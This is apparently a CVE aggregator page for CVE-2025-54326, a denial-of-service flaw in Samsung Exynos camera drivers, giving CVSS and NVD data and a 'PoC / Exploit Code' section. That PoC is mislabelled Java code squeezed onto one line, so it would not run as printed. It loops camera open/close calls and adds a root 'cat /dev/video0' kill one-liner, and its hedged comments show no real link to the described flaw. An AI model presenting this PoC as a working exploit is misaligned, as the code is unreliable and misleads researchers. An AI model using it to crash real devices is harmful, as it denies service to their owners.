Security Vulnerability Report
中文
CVE-2025-54326 CVSS 7.5 HIGH

CVE-2025-54326

Published: 2025-12-03 17:15:52
Last Modified: 2025-12-05 16:59:50

Description

An issue was discovered in Camera in Samsung Mobile Processor Exynos 1280 and 2200. Unnecessary registration of a hardware IP address in the Camera device driver can lead to a NULL pointer dereference, resulting in a denial of service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:* - NOT VULNERABLE
Samsung Exynos 1280 (所有未修复版本)
Samsung Exynos 2200 (所有未修复版本)
使用上述处理器的Galaxy系列智能手机和平板设备

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-54326 PoC - NULL Pointer Dereference in Samsung Exynos Camera Driver // This PoC demonstrates triggering the vulnerability through malformed Camera API calls // Note: Actual exploitation requires specific device firmware and kernel configuration import android.hardware.camera2.*; import android.content.Context; import android.os.Handler; import android.os.Looper; public class CVE_2025_54326_PoC { private CameraManager cameraManager; private Context context; public void triggerVulnerability() { try { cameraManager = (CameraManager) context.getSystemService(Context.CAMERA_SERVICE); String[] cameraIds = cameraManager.getCameraIdList(); for (String cameraId : cameraIds) { CameraCharacteristics characteristics = cameraManager.getCameraCharacteristics(cameraId); Integer facing = characteristics.get(CameraCharacteristics.LENS_FACING); // Target back-facing camera if (facing != null && facing == CameraCharacteristics.LENS_FACING_BACK) { // Trigger vulnerability through rapid preview surface switching // causing NULL pointer dereference in hardware address registration triggerRapidPreviewSwitch(cameraId); } } } catch (Exception e) { // Exception may indicate successful trigger of NULL pointer dereference e.printStackTrace(); } } private void triggerRapidPreviewSwitch(String cameraId) throws CameraAccessException { // Rapidly switch between different preview surfaces // This can trigger race condition in hardware IP address registration for (int i = 0; i < 100; i++) { try { // Open and close camera rapidly cameraManager.openCamera(cameraId, new CameraDevice.StateCallback() { @Override public void onOpened(CameraDevice camera) { // Rapid release to trigger NULL pointer camera.close(); } @Override public void onDisconnected(CameraDevice camera) { camera.close(); } @Override public void onError(CameraDevice camera, int error) { camera.close(); } }, new Handler(Looper.getMainLooper())); Thread.sleep(10); } catch (InterruptedException e) { break; } } } } // Kernel-level trigger (requires root): // cat /dev/video0 & sleep 0.1 && kill -9 $! 2>/dev/null // Repeated execution may trigger NULL pointer in camera driver

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54326", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:52.350", "lastModified": "2025-12-05T16:59:49.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Camera in Samsung Mobile Processor Exynos 1280 and 2200. Unnecessary registration of a hardware IP address in the Camera device driver can lead to a NULL pointer dereference, resulting in a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1A7B09-9031-4E54-A24F-3237C054166B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:*", "matchCriteriaId": "DFC68046-2F08-40D1-B158-89D8D9263541"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]}], "references": [{"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54326/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}